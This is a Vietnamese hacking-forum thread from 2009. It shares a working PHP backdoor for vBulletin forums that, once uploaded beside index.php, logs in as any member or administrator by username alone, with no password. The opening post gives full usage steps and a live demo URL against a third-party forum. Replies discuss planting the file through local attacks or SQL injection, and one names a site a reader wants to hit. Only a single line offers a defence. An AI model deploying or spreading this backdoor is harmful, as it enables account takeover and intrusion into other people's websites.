Fakelogin - Đăng nhập vào forum VBB không cần pass

Vũ Thanh Lai 05:36 PM 10-03-2009

Ngày xưa forum mình bị hack thằng nào đó nó up lên, xem log tình cờ phát hiện ra, chưa rõ nguồn gốc xuất xứ

Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass


Sau đây là code

PHP Code:

<?php
if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}

?>

Cách sử dụng


Copy đoạn code trên vào notepad save đuôi *.php

Upload vào thư mục chứa forum ngang hàng với file index.php

Sau đó chạy link sau

http://domain.com/forum/*.php?bd=username



Phần in đậm các bạn tùy chỉnh nha ^^



>>> Demo tươi và sống

http://www.shbabarab.com/vb/tools.php?bd=alghreeb

VBF
Giải pháp: Tạo thêm 1 lớp mật khẩu cho VBB tại admincp. Xem thêm box bảo mật22 người đã cám ơn bài viết này

cUchUoi_ 11:52 AM 31-03-2009

chu topic co quen ai ben thegioingam.biz ko anh,tao dum em 1 nick ben do de tim cach reg nick paltalk bang cc duoc ko chu topic

Off_To_Study 10:28 PM 16-05-2009

Upload vào thư mục chứa forum ngang hàng với file index.php
anh admin cho em hỏi là sao mình biết mã nó mà đòi up ngang hàng với index của web kia đc nhưng up bằng FTPcute nữa hả anh

Vũ Thanh Lai 01:20 AM 17-05-2009

PHP Code:

require_once('./global.php');
require_once('./includes/functions_login.php'); 

Thấy đoạn code đó ko ? Nếu học HTML rồi cậu sẽ biết đường dẫn tương đối

HTML Code:

./

Với cấu trúc đường dẫn tương đối

HTML Code:

./global.php

thì file upload này phải ngang hàng với file global.php
Mà file này ngang hàng với file index. Song ít người để ý đến file này mà index thì ai cũng biết nên nói ngang hàng với index cho nhanh hiểu mất công lại hỏi file global.php năm đâu, là file nào.. lại mệt thân thêm

Còn cái này hack người ta làm gì có dụ up load bằng ftpcuter chứ. User và pass đâu mà up. Cậu hỏi cũng phải xem nó ở box nào chứ. Đi hack mà có ai đưa user và pass cho hack ko trời. mà nếu người ta đưa user và pass thì đâu còn là hack nữa2 người đã cám ơn bài viết này

Bot 10:34 PM 11-06-2009

Hỏi tí không phải, thế làm sao để up file này lên forum của nó thế
Up trong đính kèm tập tin à

Vũ Thanh Lai 10:54 PM 11-06-2009

TRời, nếu như vậy là quá dễ rồi, làm sao để up đc hay đưa vào plugin của nó lại là 1 chuyện khác3 người đã cám ơn bài viết này

Bot 11:48 PM 11-06-2009

Nguyên văn bởi :
nó lại là 1 chuyện khác

Chuyện khác này có phải là Local không nhỉ

Vũ Thanh Lai 11:56 PM 11-06-2009

local chỉ là 1 cách, có thể qua sql injection ...2 người đã cám ơn bài viết này

™KingDragon™ 10:07 AM 12-06-2009

bài này hôm trước mình thấy rồi , của thằng VipQBoy nhưng mà tiếc là cái clip của nó die rồi1 người đã cám ơn bài viết này

dxdiag 12:43 PM 19-06-2009

hic chan qua. em dang can cai nay de choi cai thang admin svhitech.net ma khong biet lam sao. bac nao muon thuc hanh thi cu vo do ma thuc hanh nha ^^!1 người đã cám ơn bài viết này